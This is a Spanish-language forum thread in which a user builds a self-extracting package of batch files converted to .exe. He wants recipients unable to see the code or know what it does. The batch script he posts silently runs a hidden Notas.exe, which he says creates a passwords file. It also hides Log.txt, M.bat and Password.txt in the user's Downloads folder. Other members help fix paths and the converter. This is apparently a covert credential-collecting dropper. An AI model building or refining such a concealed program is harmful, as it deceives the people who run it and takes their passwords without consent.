Hola a todos,estoy creando algo en un .bat que ejecuta otros .bat pasados a .exe (al igual que el archivo principal que los ejecuta). Pero resulta que cuando ejecuto el archivo principal ya pasado a .exe me tira error diciendo que no encontró a los otros ".exe". Pero si yo el archivo principal lo ejecuto en .bat (sin pasarlo a .exe) me ejecuta los otros .exe sin ningún problema. Entonces pienso que la única manera es ejecutarlo con la extensión .bat el archivo principal. Ahora viene el problema:
Yo lo paso a .exe con winrar, osea que tranquilamente puedo extraer el .bat haciendo clic derecho sobre el .exe (autoextraible creado con winrar) y clickeando extraer, pero eso no me preocupa ya que pienso que la gente que va a usar esto no va a hacerlo. Pero si lo ven .bat (ya con el icono y viendo que se abre la cmd es un poco obvio) puede hacer clic derecho y clickean editar, ven todo el codigo, y no quiero que lo vean y sepan que hace.
Hay alguna forma de hacer que no se pueda ver el codigo que contiene? Pienso que lo mejor seria soluciar el problema desde el archivo con extension .bat y no .exe, por eso pregunto lo del codigo (pienso yo,no tengo idea XD).
Espero que me hayan podido entender y me puedan ayudar.
Gracias
utiliza el smark install maker ese te puede ayudar colocando todos los bat dirigiendote a archivos y luego a dialogos y colocas instalacion silenciosa, posteriormente organizandolos en comando

saludos.
_VERSION
Primero que nada gracias por responder. Use el convertidor de Blau y no tiro el error y creo que funciona correctamente,ahora me faltaria cambiarle el icono y probar todo bien. Me tira igual algunos error de parametros incorrectos y que no encontro un archivo (se refiere al oculto,pero lo ejecuta y hace todo lo que tiene que hacer,medio raro XD) Cualquier duda vuelvo a postear y si tengo algun problema pruebo tu solucion die595tack067.

Cambiando un poco de S.O. (Yo todo esto lo hice desde win7 pero ahora lo estoy preparando para XP), en XP no me ejecuta el archivo que tengo oculto. Para que entiendan mejor mi archivo ejecuta otros 2 archivos,1 bat pasa a .exe y un .exe,este ultimo es el que lo voy a poner oculto,y no me lo ejecuta,me tira como que no lo encontro,pero en win7 me tira lo mismo,pero lo ejecuta,lo mueve,lo copia,etc. Hay algun comando para ejecutar archivos ocultos o algo? Porque nose que es lo que estaria mal.

PD: No pude cambiar el icono no reshacker,hay alguna otra forma?
No me funciono, porque cuando abro el archivo en el reshacker no me aparece ninguna carpeta en el programa. Ya fue,lo mando asi sin icono, pero del problema en XP,alguien me puede ayudar?
Gracias igual MCN!
elnikookpo escribió:No me funciono, porque cuando abro el archivo en el reshacker no me aparece ninguna carpeta en el programa. Ya fue,lo mando asi sin icono, pero del problema en XP,alguien me puede ayudar?
Gracias igual MCN!
Acuérdate de poner comillas dobles en las rutas. En batch (y muchos lenguajes más) no es lo mismo hola blau.exe (sin comillas) que "hola blau.exe".
Blau escribió:Acuérdate de poner comillas dobles en las rutas. En batch (y muchos lenguajes más) no es lo mismo hola blau.exe (sin comillas) que "hola blau.exe".
Si,esta con comillas, te pongo la parte del codigo para que veas si tengo algo mal:
move "Log.txt" "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads\Log.txt">nul
copy "M.bat" "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads\M.bat">nul
copy "Notas.exe" "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads\Notas.exe">nul
start /d "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads" Notas.exe >nul
attrib +h "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads\Log.txt
attrib +h "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads\M.bat"
attrib +h "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads\Password.txt"
start /d "C:\Documents and Settings\%USERNAME%\Mis documentos\Downloads" M.bat
echo.
echo.
pause 
exit
El Notas.exe es el archivo que al extraerlo del rar, se extrae oculto, de modo que solo se verian el archivo M.bat (ya pasado a .exe, solo que aca lo muestro .bat xq primero pruebo todo con el archivo .bat y luego lo paso a .exe) El problema que tengo es con el archivo Notas.exe xq lo ejecuta y esta oculto.
En win7 no hubo ningun problema y ejecuta todo perfectamente,pero aca no :(. El unico error es cuando en la 3ra linea se da la orden de copiar no lo copia y tira como que el archivo no se encontro, pero luego cuando se le pide que lo ejecute,si se ejecuta,ya que al ejecutarlo se crea el archivo passwords.txt y si se crea.
Es algo medio confuso XD
Me acabo de dar cuenta que tenia unos errores en el codigo,y que no se ejecutaba porque el archivo Notas.exe no se ejecuta en Win XP XD.
Gracias a todos por su ayuda!
Responder

Volver a “Dudas y Preguntas”